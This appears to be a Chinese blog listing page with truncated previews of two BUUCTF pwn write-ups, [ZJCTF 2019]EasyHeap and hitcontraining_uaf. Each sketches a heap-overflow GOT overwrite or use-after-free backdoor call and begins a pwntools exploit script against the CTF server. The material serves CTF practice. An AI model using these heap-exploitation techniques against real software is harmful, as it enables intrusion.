- 博客(3)
- 收藏
- 关注
原创 [ZJCTF 2019]EasyHeap
国际惯例ida后门有cat flag 因为平台是buu所以不考虑能打印flag,别问为什么!addeditdel思路有堆溢出而且没有PIE,那大概是改写got表了。WPfrom pwn import *p = remote('node3.buuoj.cn',28946)elf =ELF('./easyheap')def add(size,content): p.recvuntil('Your choice :') p.sendline('1') p.recv
2021-06-16 17:07:44
178
原创 hitcontraining_uaf
国际惯例IDA主函数没啥特别的有后门adddelshow思路首先我们创建两个chunk,再free掉,之后add一个8字节的chunk,并添加后门,在通过show功能调用后门函数。WPfrom pwn import*r=remote('node3.buuoj.cn',26891)def add(size,content): r.sendlineafter('choice :','1') r.sendlineafter('Note size :',str(size)
2021-06-15 21:21:52
174
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人